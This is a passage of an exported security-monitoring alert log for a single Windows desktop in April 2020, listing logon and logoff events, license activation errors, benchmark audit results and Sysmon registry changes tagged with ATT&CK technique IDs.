DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 26, 2020 @ 10:55:57.427",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 26, 2020 @ 10:55:45.676",3,"Windows User Logoff",,"""An account was logged off. + +Subject: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0xBB6B1 + +Logon Type: 2 + +This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.""" +"Apr 26, 2020 @ 10:55:45.615",3,"Windows User Logoff",,"""An account was logged off. + +Subject: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0xBB6DA + +Logon Type: 2 + +This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.""" +"Apr 26, 2020 @ 10:55:45.334",3,"Windows Workstation Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 2 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: No + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0xBB6DA + Linked Logon ID: 0xBB6B1 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x160 + Process Name: C:\Windows\System32\svchost.exe + +Network Information: + Workstation Name: DESKTOP-HUE026H + Source Network Address: 127.0.0.1 + Source Port: 0 + +Detailed Authentication Information: + Logon Process: User32 + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 26, 2020 @ 10:55:45.301",3,"Windows Workstation Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 2 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0xBB6B1 + Linked Logon ID: 0xBB6DA + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x160 + Process Name: C:\Windows\System32\svchost.exe + +Network Information: + Workstation Name: DESKTOP-HUE026H + Source Network Address: 127.0.0.1 + Source Port: 0 + +Detailed Authentication Information: + Logon Process: User32 + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 26, 2020 @ 10:55:36.572",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 26, 2020 @ 10:55:31.708",5,"License Activation (slui.exe) failed",,"""License Activation (slui.exe) failed with the following error code: +hr=0x803F7001 +Command-line arguments: +RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2b1f36bb-c1cd-4306-bf5c-a0367c2d97d8;NotificationInterval=1440;Trigger=TimerEvent""" +"Apr 26, 2020 @ 10:55:31.614",5,"License Activation (slui.exe) failed",,"""License Activation (slui.exe) failed with the following error code: +hr=0x803F7001 +Command-line arguments: +RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2b1f36bb-c1cd-4306-bf5c-a0367c2d97d8;NotificationInterval=1440;Trigger=UserLogon;SessionId=1""" +"Apr 26, 2020 @ 10:55:26.522",5,"SCA summary: Benchmark for Windows audit: Score less than 80% (66)",, +"Apr 26, 2020 @ 10:55:23.742",3,"The Windows Search Service started",,"""The Windows Search Service started. +""" +"Apr 26, 2020 @ 10:55:23.665",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 26, 2020 @ 10:55:23.564",3,"The database engine attached a database",,"""SearchIndexer (4628,D,50) Windows: The database engine attached a database (1, C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.edb). (Time=0 seconds) + +Saved Cache: 0 0 +Additional Data: lgposAttach = 00000013:00CD:0268, +dbv = 1568.20.0 + +Internal Timing Sequence: +[1] 0.000003 +J(0) +M(C:0K, Fs:1, WS:4K # 0K, PF:0K # 0K, P:0K) +[2] 0.048916 -0.048683 (1) WT +J(0) +M(C:0K, Fs:25, WS:36K # 0K, PF:32K # 0K, P:32K) +[3] 0.044182 -0.039828 (6) WT +J(CM:0, PgRf:0, Rd:0/0, Dy:0/0, Lg:3480/2) +M(C:0K, Fs:41, WS:124K # 0K, PF:144K # 0K, P:144K) +[4] 0.000120 +J(0) +[5] - +[6] - +[7] - +[8] 0.002436 -0.000803 (2) CM +J(CM:2, PgRf:2, Rd:14/2, Dy:0/0, Lg:0/0) +M(C:0K, Fs:51, WS:204K # 0K, PF:640K # 0K, P:640K) +[9] 0.066380 -0.004388 (5) CM -0.061757 (1) WT +J(CM:5, PgRf:23, Rd:0/5, Dy:0/0, Lg:0/0) +M(C:0K, Fs:67, WS:268K # 0K, PF:256K # 136K, P:256K) +[10] 0.000183 -0.000084 (1) CM +J(CM:1, PgRf:40, Rd:0/1, Dy:0/0, Lg:0/0) +M(C:0K, Fs:11, WS:44K # 24K, PF:96K # 96K, P:96K) +[11] 0.000012 +J(CM:0, PgRf:1, Rd:0/0, Dy:0/0, Lg:0/0) +M(C:0K, Fs:4, WS:16K # 16K, PF:0K # 0K, P:0K) +[12] 0.000033 +J(CM:0, PgRf:42, Rd:0/0, Dy:0/0, Lg:0/0) +M(C:0K, Fs:3, WS:12K # 12K, PF:0K # 0K, P:0K) +[13] 0.0 +J(0) +[14] 0.0 +J(0) +[15] 0.000004 +J(CM:0, PgRf:1, Rd:0/0, Dy:0/0, Lg:0/0).""" +"Apr 26, 2020 @ 10:55:23.331",3,"The database engine is starting a new instance",,"""SearchIndexer (4628,P,98) Windows: The database engine (10.00.18363.0000) is starting a new instance (0).""" +"Apr 26, 2020 @ 10:55:21.786",9,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from 'not applicable' to failed",, +"Apr 26, 2020 @ 10:55:19.804",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:55:15.274858600Z"",""eventRecordID"":""673"",""processID"":""2196"",""threadID"":""3228"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:55:15.231\r\nProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\TabletInputService\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:55:15.231"",""processGuid"":""{df9fc3d3-6889-5ea5-0000-001041a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\TabletInputService\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:55:15.231 +ProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\TabletInputService\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:55:18.865",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:55:14.983548900Z"",""eventRecordID"":""667"",""processID"":""2196"",""threadID"":""3228"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:55:14.933\r\nProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\WpnUserService_3f520\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:55:14.933"",""processGuid"":""{df9fc3d3-6889-5ea5-0000-001041a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\WpnUserService_3f520\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:55:14.933 +ProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\WpnUserService_3f520\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 26, 2020 @ 10:55:18.838",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:55:14.983337800Z"",""eventRecordID"":""666"",""processID"":""2196"",""threadID"":""3228"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:55:14.933\r\nProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\WpnUserService_3f520\\Start\r\nDetails: DWORD (0x00000002)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:55:14.933"",""processGuid"":""{df9fc3d3-6889-5ea5-0000-001041a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\WpnUserService_3f520\\\\Start"",""details"":""DWORD (0x00000002)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:55:14.933 +ProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\WpnUserService_3f520\Start +Details: DWORD (0x00000002)""" +"Apr 26, 2020 @ 10:55:18.819",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:55:14.982535100Z"",""eventRecordID"":""665"",""processID"":""2196"",""threadID"":""3228"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:55:14.933\r\nProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\UserDataSvc_3f520\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:55:14.933"",""processGuid"":""{df9fc3d3-6889-5ea5-0000-001041a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\UserDataSvc_3f520\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:55:14.933 +ProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\UserDataSvc_3f520\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 26, 2020 @ 10:55:18.802",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:55:14.980829000Z"",""eventRecordID"":""664"",""processID"":""2196"",""threadID"":""3228"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:55:14.933\r\nProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\UserDataSvc_3f520\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:55:14.933"",""processGuid"":""{df9fc3d3-6889-5ea5-0000-001041a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\UserDataSvc_3f520\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:55:14.933 +ProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\UserDataSvc_3f520\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:55:18.779",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:55:14.979243700Z"",""eventRecordID"":""663"",""processID"":""2196"",""threadID"":""3228"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:55:14.933\r\nProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\UnistoreSvc_3f520\\ImagePath\r\nDetails: C:\\Windows\\System32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:55:14.933"",""processGuid"":""{df9fc3d3-6889-5ea5-0000-001041a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\UnistoreSvc_3f520\\\\ImagePath"",""details"":""C:\\\\Windows\\\\System32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:55:14.933 +ProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\UnistoreSvc_3f520\ImagePath +Details: C:\Windows\System32\svchost.exe -k UnistackSvcGroup""" +"Apr 26, 2020 @ 10:55:18.762",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:55:14.978847300Z"",""eventRecordID"":""662"",""processID"":""2196"",""threadID"":""3228"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:55:14.933\r\nProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\UnistoreSvc_3f520\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:55:14.933"",""processGuid"":""{df9fc3d3-6889-5ea5-0000-001041a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\UnistoreSvc_3f520\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:55:14.933 +ProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\UnistoreSvc_3f520\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:55:18.648",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:55:14.978058900Z"",""eventRecordID"":""661"",""processID"":""2196"",""threadID"":""3228"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:55:14.933\r\nProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\PrintWorkflowUserSvc_3f520\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k PrintWorkflow\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:55:14.933"",""processGuid"":""{df9fc3d3-6889-5ea5-0000-001041a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PrintWorkflowUserSvc_3f520\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k PrintWorkflow""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:55:14.933 +ProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\PrintWorkflowUserSvc_3f520\ImagePath +Details: C:\Windows\system32\svchost.exe -k PrintWorkflow""" +"Apr 26, 2020 @ 10:55:18.618",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:55:14.977702900Z"",""eventRecordID"":""660"",""processID"":""2196"",""threadID"":""3228"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:55:14.933\r\nProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000}\r\nProcessId: 588\r\nImage: 